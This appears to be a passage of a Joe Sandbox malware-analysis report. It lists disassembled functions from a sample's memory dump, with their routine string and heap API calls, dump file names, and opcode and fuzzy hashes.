                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 37c2eb23f94d9d231a62b3c0b0068704dd293d99133859e6517c0ca7827a279b
                                  • Instruction ID: db6deaa231cd79da88bb07a29d969ab82147c49e2feabf2edc80d9a5fd103bc9
                                  • Opcode Fuzzy Hash: 37c2eb23f94d9d231a62b3c0b0068704dd293d99133859e6517c0ca7827a279b
                                  • Instruction Fuzzy Hash: ACF0623290C7109AD761BBB86C0A75933A36F00765F2C420BF444AA3D2DF685901F655
                                  Function 00FD7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(------,00FB5BEB), ref: 00FD731B
                                  • lstrcpy.KERNEL32(00000000), ref: 00FD733F
                                  • lstrcat.KERNEL32(?,------), ref: 00FD7349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: efc9f3abffde529582bec334a0c74a4d50722f6bfc3146db88422fb0826e3a93
                                  • Instruction ID: abcf7adca5bfa5dbe512c92c8594bd630b13a74a6590b3df59103a1e6072ce17
                                  • Opcode Fuzzy Hash: efc9f3abffde529582bec334a0c74a4d50722f6bfc3146db88422fb0826e3a93
                                  • Instruction Fuzzy Hash: 9AF0C0749117029FDB68AFB6D848926BAF9EF8471531C882DA89ACB304E734D880DB10
                                  Function 00FC33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC3422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC3471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC3497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: ba090e57a5fac8051118cf1f46653951a0e3f6130570f6275b9df5b244346d10
                                  • Instruction ID: 1915c4a670e0413b7dc3752ade0c20b4e854f33d0f99ee43b56cf3fdd70b1bc5
                                  • Opcode Fuzzy Hash: ba090e57a5fac8051118cf1f46653951a0e3f6130570f6275b9df5b244346d10
                                  • Instruction Fuzzy Hash: 5B12EA71E012028FDB28CF19C655F25B7E5AF44768B1DC0ADE8099B3A6D772ED82DB40
                                  Function 00FC7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7CAF
                                    • Part of subcall function 00FC7D40: std::_Xinvalid_argument.LIBCPMT ref: 00FC7D58
                                    • Part of subcall function 00FC7D40: std::_Xinvalid_argument.LIBCPMT ref: 00FC7D76
                                    • Part of subcall function 00FC7D40: std::_Xinvalid_argument.LIBCPMT ref: 00FC7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: d8a8df2601fc4ee4a78dbc1b1a783f0e1f95068dcd08a8b47b65171dc726e28e
                                  • Instruction ID: 54b850651bab5919fdf6bd7f64190cbdb5a526fa23fd149adf7a64ab660408ec
                                  • Opcode Fuzzy Hash: d8a8df2601fc4ee4a78dbc1b1a783f0e1f95068dcd08a8b47b65171dc726e28e
                                  • Instruction Fuzzy Hash: 423109723083138BD724ED6CE981F6AF7E9EF91760B20452EF442CB641C7719C419BA4
                                  Function 00FB6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00FB6F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB6F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: b90fa749ec69dcaf298fdec06d0d312d80a280fcc38da73d420fa56ab86261b8
                                  • Instruction ID: bf69cda9f68126d9cd28bf1117ae3019856bcd0562770dbc0c2ea4b8e73f2b4c
                                  • Opcode Fuzzy Hash: b90fa749ec69dcaf298fdec06d0d312d80a280fcc38da73d420fa56ab86261b8
                                  • Instruction Fuzzy Hash: 5D218EB0A007019BEB20CB61DC84BB673E8EB44714F44487CF946CBA84F7B9E985DB50
                                  Function 00FD2400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD244C
                                  • lstrlen.KERNEL32(00000000), ref: 00FD24E9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD2570
                                  • lstrlen.KERNEL32(00000000), ref: 00FD2577
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 7daf8cfbd9050ebc2d7d1e09bf61fb1e5242f14b7f3b103acf9cd6130bb3b1b5
                                  • Instruction ID: 6661d7258261a6f7290e3d0902fc7fadeba6b2cd9c59ba8f820056627d022c47
                                  • Opcode Fuzzy Hash: 7daf8cfbd9050ebc2d7d1e09bf61fb1e5242f14b7f3b103acf9cd6130bb3b1b5
                                  • Instruction Fuzzy Hash: 9781D271E003099BDB54DF98DC44BAEB7B6AF94314F1C806AE908AB381EB759D41DB90
                                  Function 00FD1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00FD15A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD15D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD1611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD1649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 5b2050672f21b3ab9a77a450c94af144fe9ed88811dc05ae6342219ac8cd3c50
                                  • Instruction ID: febddba5e949f607b6c85264490c5d06ecb24312df15c8ecf8330c08450b3835
                                  • Opcode Fuzzy Hash: 5b2050672f21b3ab9a77a450c94af144fe9ed88811dc05ae6342219ac8cd3c50
                                  • Instruction Fuzzy Hash: D621B874A11B029BD774EF6AD854A17B7FABF44710B084A1DA496C7B40DB38E841EF90
                                  Function 00FB1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00FB1610: lstrcpy.KERNEL32(00000000), ref: 00FB162D
                                    • Part of subcall function 00FB1610: lstrcpy.KERNEL32(00000000,?), ref: 00FB164F
                                    • Part of subcall function 00FB1610: lstrcpy.KERNEL32(00000000,?), ref: 00FB1671
                                    • Part of subcall function 00FB1610: lstrcpy.KERNEL32(00000000,?), ref: 00FB1693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 3e56e792efb23660347ddb7c625d3a57eb4f5867aa30a7c7ceb9355a481119f2
                                  • Instruction ID: b1ff1f034a0dc4355c2317ec3558a87757326a20821bc0cc6a95e452de8536ac
                                  • Opcode Fuzzy Hash: 3e56e792efb23660347ddb7c625d3a57eb4f5867aa30a7c7ceb9355a481119f2
                                  • Instruction Fuzzy Hash: B131D474A11B029FD728DF7AC598992BBE5BF88314744492DA8A6C3B10DB34F851DF80
                                  Function 00FB1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00FB162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 99317805bd682a73dda2ffc8c87f6260e63e519dde07c1808b16298bb7113244
                                  • Instruction ID: fb5345277939986c683d4b0533121a3f152013cddfda09145654a10a75d24578
                                  • Opcode Fuzzy Hash: 99317805bd682a73dda2ffc8c87f6260e63e519dde07c1808b16298bb7113244
                                  • Instruction Fuzzy Hash: 10115E74A11B029BDB289F77D468966B7F9BF44311748052DA89AC7B40EB34E841DF90